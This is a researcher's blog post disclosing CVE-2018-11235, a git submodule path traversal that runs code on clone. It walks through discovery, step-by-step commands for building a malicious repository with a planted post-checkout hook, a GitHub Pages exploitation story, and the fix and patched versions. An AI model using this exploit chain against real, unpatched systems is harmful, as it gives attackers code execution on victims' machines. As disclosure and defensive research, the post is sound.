Recently I was working on a git repository that contained numerous submodules. At this point I realised that I did not know how submodules worked and decided to dive into the submodule system to gain a better understanding. During this process of discovery I came across a vulnerability in the submodule system, which lead to Remote Code Execution (RCE) in git when a submodule was initialised. This allowed for reliable exploitation of the host that was cloning my malicious repository, and ultimately gave me RCE in GitHub Pages and CVE-2018-11235 for git.

What follows are the steps that led to the discovery of the vulnerability and how to exploit it. This is probably one of my favourite bugs that I’ve found. Simple on the face of it, but I had to work, and needed some luck, to achieve code execution.

Submodule Basics

Git allows you to include external repositories into your repository, allowing you to easily include external dependencies and automatically track changes to these. From git-scm

A submodule is a repository embedded inside another repository. The submodule has its own history; the repository it is embedded in is called a superproject.

If you want the full low-down on submodules, these resources could be useful:

To understand how submodules work, let’s add a basic submodule and see what changes are made to our repository. To add a submodule to your repository you simply use the git submodule add command. This takes care of cloning the external repository and setting up a few configuration options for you. Each submodule has a name and a path. The path is used to track the submodule and this is also where in your repository the submodule will be stored.

If we add an external submodule with

git submodule add https://github.com/staaldraad/repository.git mysubmodule

the following files will be created:

  • mysubmodule/ - this is the path relative to your repository into which the submodule will be cloned
  • .gitmodules - this file will be created if it doesn’t exist, and will contain the basic init information about your submodule[s]
  • $GIT_DIR/modules/mysubmodule - this folder contains the git directory for the submodule (this is the same as the .git directory you already know)
  • $GIT_DIR/config - the .git/config file gets modified to contain a reference to all our submodules

Once the submodule has been added to the repository and you push the changes to your remote, you might notice that the contents of the submodule aren’t actually added to the remote. The .gitmodules file contains the information about our submodule[s] and will be used to initialise the submodules in any clones of our repository.

Submodule in a repo

Submodule in a repo

To have the submodule[s] get initialised in your local clone of the repository, you would either need to specify this during the clone with:

git clone --recurse-submodules https://github.com/staaldraad/repository.git

Or you can do it in an existing repository with:

git submodule update --init

The .gitmodules file plays an important role in submodules, and is something under our control. Inspecting the .gitmodules file you’ll see the following:

[submodule "mysubmodule"]
        path = mysubmodule
        url = https://github.com/staaldraad/repository.git

And this is where I noticed something that triggered the “spidey senses” and the search for a vulnerability started.

Vulnerability Discovery

Looking at the .gitmodules file you might notice that mysubmodule occurs twice, once in the submodule name and once in our path. By default the submodule name is the same as the submodule path, unless a name is specified with the --name argument. What you might also notice, is that submodule name is used to create the .git directory for the submodule. The path for this directory ended up being$GIT_DIR/modules/mysubmodule. This got me wondering, what if the submodule name is a path? To see if I could manipulate the file path used, I modified the submodule name in the .gitmodules file.

The modified .gitmodules:

[submodule "../../submodule"]
        path = mysubmodule
        url = https://github.com/staaldraad/repository.git

I committed the changes and went through the process of cloning the directory. The changes to the submodule name resulted in the submodule repository being created in the main repository instead of in .git/modules where it belongs.

git clone --recurse-submodules https://github.com/staaldraad/repository.git
<snip>...</snip>

cd repository

ls -l 
drwxrwxr-x. 2 staaldraad staaldraad    40 May  3 13:26 submodule
-rw-rw-r--. 1 staaldraad staaldraad     3 May  3 13:26 README.md
drwxrwxr-x. 2 staaldraad staaldraad    40 May  3 13:26 mysubmodule

ls -l submodule                                                                                                             
total 28
drwxrwxr-x. 2 staaldraad staaldraad    40 May  3 13:26 branches
-rw-rw-r--. 1 staaldraad staaldraad   293 May  3 13:26 config
-rw-rw-r--. 1 staaldraad staaldraad    73 May  3 13:26 description
-rw-rw-r--. 1 staaldraad staaldraad    41 May  3 13:26 HEAD
drwxrwxr-x. 2 staaldraad staaldraad   240 May  3 13:26 hooks
-rw-rw-r--. 1 staaldraad staaldraad 11120 May  3 13:26 index
drwxrwxr-x. 2 staaldraad staaldraad    60 May  3 13:26 info
drwxrwxr-x. 3 staaldraad staaldraad    80 May  3 13:26 logs
drwxrwxr-x. 4 staaldraad staaldraad    80 May  3 13:26 objects
-rw-rw-r--. 1 staaldraad staaldraad   107 May  3 13:26 packed-refs
drwxrwxr-x. 5 staaldraad staaldraad   100 May  3 13:26 refs

Turns out there is directory traversal in the submodule cloning function and we can now write to an arbitrary location, but unfortunately we don’t control the data. Everything that is created comes from git, and besides, what use is a git repository when we want to get code execution? At this point I went down a small rabbit hole of trying to write to different locations using symlinks, and all this got me however was the ability to overwrite existing folders (annoying and destructive, but not really all that useful).

Taking a step back and deciding to worry less about fully controlling the contents to be written and having a look at git itself and how you could execute code from git, I was reminded of git hooks.

git hooks

Git hooks are divided into your client-side and server-side hooks. These hooks are simply executable scripts (bash, etc) that are triggered when predefined events happen in the git workflow. A common example of this is a pre-commit hook that verifies no sensitive data is being included in the commit. These hooks seem like a promising avenue for code-execution, but unfortunately hooks are located in $GIT_DIR/hooks/, meaning they are never include in your git repository stored on a remote, and aren’t part of what gets cloned when you do a git clone. This is for good reason, if hooks were in the actual git work-tree, I could easily create a repository with a malicious client-side hook and anyone cloning that repository would end up executing the hook. Not ideal.

Submodules can also have hooks, since the submodule is simply an external git repository, and these are stored in $GIT_DIR/modules/modulename/hooks. This gave me an idea, what if we use our submodule directory traversal to create/trigger a hook outside of the $GIT_DIR?

Back to traversal

Since the traversal allows our submodule repository to be outside of the $GIT_DIR we can add it to our work-tree and commit this to our remote. This means it would be included in any git clone and in theory the hook should trigger when any changes are made to the submodule.

At this point I did the following:

Add a submodule:

git submodule add https://github.com/staaldraad/repository.git submod

Create a “fakegit” directory to use for our traversal:

mkdir -p fakegit/modules

Move the folder out of $GIT_DIR/modules and into the main repository (for traversal):

mv .git/modules/submod fakegit/modules

Create a git hook

vim fakegit/modules/submod/hooks/post-checkout
chmod +x !$

Modify .gitmodules to contain the traversal (new module name: ../../fakegit/modules/submod)

Push everything to the remote:

git add .
git commit -m "msg"
git push origin master

The idea being that when the repository gets cloned, fakegit/modules/submod would appear to be a valid submodule repository, and when the subsequent git submodule update --init is run, git would use fakegit/modules/submod instead of $GIT_DIR/modules/submod due to our traversal. Since this contains a hook, the hook should be executed once the checkout completes.

Great in theory, but in practice it fails.

Submodule '../../fakegit/modules/submod' (https://github.com/staaldraad/repository.git) registered for path 'submod'
Cloning into '/tmp/c/v/subs/submod'...
fatal: /tmp/c/v/subs/.git/modules/../../fakegit/modules/submod already exists
fatal: clone of 'https://github.com/staaldraad/repository.git' into submodule path '/tmp/c/v/subs/submod' failed
Failed to clone 'submod'. Retry scheduled
Cloning into '/tmp/c/v/subs/submod'...
remote: Counting objects: 274, done.        
remote: Compressing objects: 100% (227/227), done.        
remote: Total 274 (delta 14), reused 268 (delta 8), pack-reused 0        
Receiving objects: 100% (274/274), 44.03 KiB | 392.00 KiB/s, done.
Resolving deltas: 100% (14/14), done.
Submodule path 'submod': checked out 'cc0db68d85f7ce60a51c62bf451d7575e5a9a89e'
Submodule path 'submod': checked out 'cc0db68d85f7ce60a51c62bf451d7575e5a9a89e'

Recall I mentioned earlier that this traversal allowed me to overwrite arbitrary folders? That is exactly what happens here. The submodule tries to initialise the submodule repository in our fake location, but the folder already exists. It ends up deleting the contents, and then retrying. This overwrites our specially crafted attack and the hook never fires.

fatal: /tmp/c/v/subs/.git/modules/../../fakegit/modules/submod already exists
fatal: clone of 'https://github.com/staaldraad/repository.git' into submodule path '/tmp/c/v/subs/submod' failed
Failed to clone 'submod'. Retry scheduled
Cloning into '/tmp/c/v/subs/submod'...

Not willing to give up and the spidey senses shouting more than ever that RCE is within reach, I started playing a frustrating game of “prevent git from overwriting the hooks”. Initially I thought I would try and win a race, use one submodule to write the contents of the hooks folder before git tries to retry the failed clone. Unfortunately I kept failing, as the overwrite happened on the second retry, so even if I was successful with writing to the folder using a second submodule, it would all get overwritten.

Getting lucky

And this is when I got lucky. While trying to win the race, I had always (without realising it) picked a “path” for the second submodule that was alphabetically after the first submodule. This meant the first module would always try to be created, fail, the second module would get added and then the first would be cloned again. While trying different attacks, I inadvertently changed the second module’s path to be alphabetically before the first, so the second path was mod1 while the first was submod.

A small change, but it triggered a new code path, which I’m not even going to pretend I knew would happen. When one or more submodules exist in $GIT_DIR/modules, then no files get overwritten by our traversing submodule. By initialising the “second” submodule, it created the folder $GIT_DIR/modules/mod1 and suddenly fakegit/modules/submod was accepted as valid path and no overwrite occurred. This meant the hook was still present and could now be triggered!

Exploitation

With everything learned, it was time to put together an attack chain. Exploitation requires you to create the “malicious” repository, which will be cloned by our victim.

Firstly create the repo:

mkdir badrepo
cd badrepo
git init
git remote add origin https://github.com/staaldraad/demosub.git

Create needed folders where our directory traversal will look for the submodule:

mkdir -p fakegit/modules

Add two submodules as follows – the contents of these don’t matter, they just need to be public/cloneable

git submodule add https://github.com/staaldraad/repository.git submod
git submodule add https://github.com/staaldraad/repository.git aaa

Move the git repository for our fake submodule from .git/modules/submod

mv .git/modules/submod fakegit/modules/submod

Create our hook in the fake git, this should be a valid bash script

cat > fakegit/modules/submod/hooks/post-checkout <<EOF
#!/bin/sh

echo "PWNED"
ping -c 3 127.0.0.1

exit 0
EOF

chmod +x fakegit/modules/submod/hooks/post-checkout

Now add our path traversal to .gitmodules by changing "submod" to "../../fakegit/modules/submod" (a text editor works fine as well…):

sed -i '0,/submod/{s/"submod/"\.\.\/\.\.\/fakegit\/modules\/submod/}' .gitmodules

We also need to update the gitdir path in the submodule’s .git file to point to our new location. Git uses this during the construction of the working tree and would fail to create our commit if we don’t make this change (since we deleted $GIT_DIR/modules/submod when we moved it to the new fakegit location. Change gitdir: ../.git/modules/submod to gitdir: ../fakegit/modules/submod

sed -i 's/\.git/fakegit/' submod/.git

Add, commit and push

git add .
git commit -m "woot"
git push origin master

Victim side

When the repository is cloned and --recurse-submodules is used we will now get RCE:

git clone --recurse-submodules https://github.com/staaldraad/demosub.git
RCE during clone

RCE during clone

The same would happen in the case of git submodule update --init

git clone https://github.com/staaldraad/demosub.git
cd demosub
git submodule update --init

GitHub Pages RCE

Having a fresh RCE in git is great, but it requires the repository to be cloned in a specific way and might not be seen as “real world”. Thus I went looking for a good way to demonstrate risk. Having had GitHub on my list of “would love to get a shell on ‘x’” and having looked into GitHub Pages before (and hosting this blog on GitHub Pages), I knew that GitHub pages allows you to have submodules in the repository used.

Testing if this would work was really simple, a small change to the post-checkout script so that it didn’t ping localhost but rather made a reverse connection to a host under my control. And then enabling GitHub pages on the repository.

GitHub Pages RCE

GitHub Pages RCE

Great success! A quick verification that the IP address was indeed from GitHub and I knew I now had RCE on GitHub.

I didn’t try to take the exploitation further at this point, and instead focused on getting a report out to GitHub. It was good to note the use of an unprivileged user in a Docker container, limiting the attack surface and opportunities for further compromise, and preventing access to other GitHub users’ data.

I reported the issue to GitHub and they were brilliant with the response. My report went in on a Sunday afternoon CEST (so really early Sunday morning PST), within three hours of receiving the report the GitHub team had replicated, triaged and put in a temporary fix! The whole disclosure process was an advertisement for how a successful BugBounty program is run. The team over at GitHub assisted in getting the issue reported upstream into git-core and the issuing of a CVE etc.

Edge Case

When I found the vulnerability I was testing against git version 2.13.6. I asked a friend (the legend @Saif_Sherei) to test it out on his box and the exploit failed! He had git version 2.7.4 installed, which still triggered the exploit, but during the clone the worktree directory was changed to include additional ..\..\ which prevented the exploit from completing. After the vulnerability was disclosed, Tony Torralba @_atorralba replicated the vulnerability on git 2.7.4 by crafting an elegant work around. I highly recommend you head over to his write-up, where he explains his thinking and the symlink trick to get this to work.

Other Operating Systems

It should be noted that this issue isn’t only exploitable through git for Linux, as demonstrated above, but should also be exploitable on OSX and Windows. The Microsoft Visual Studio Team Services team included a working PoC for OSX in their patch announcement.

Fix

A patch for git was released on the 29th of May 2018. The great things is that the patch doesn’t only resolve the client-side issue, but also introduces an option to prevent git servers from passing along “evil” gitmodule objects. This isn’t enabled by default but can be toggled by switching on transfer.fsckObjects. More information is available in the here.

The above fix has been enabled on most major hosters; GitHub, Gitlab, Microsoft Visual Studio Team Services. This is highly commendable and prevents abuse of these hosting services and using these for launching attacks. It is great to see the different organisations working together in the remediation of this issue and protecting end-users.

The following versions have the security update applied, it is recommended that you update to a non-vulnerable version;

  • v2.17.1 (latest)
  • v2.16.4
  • v2.15.2
  • v2.14.4
  • v2.13.7

Thanks to the Github security team for facilitating the reporting and disclosure of this issue. Thanks to the maintainers of git for the quick response and fix.

Edward Thomson has also written a great post with useful information on how to update git on various platforms and how to verify whether you are vulnerable. Definitely recommend you read his post.

The git team also created a test script for the issue, which is does the exploit setup using built-in git commands and skips some unnecessary steps I went through: git test script

Further Reading / References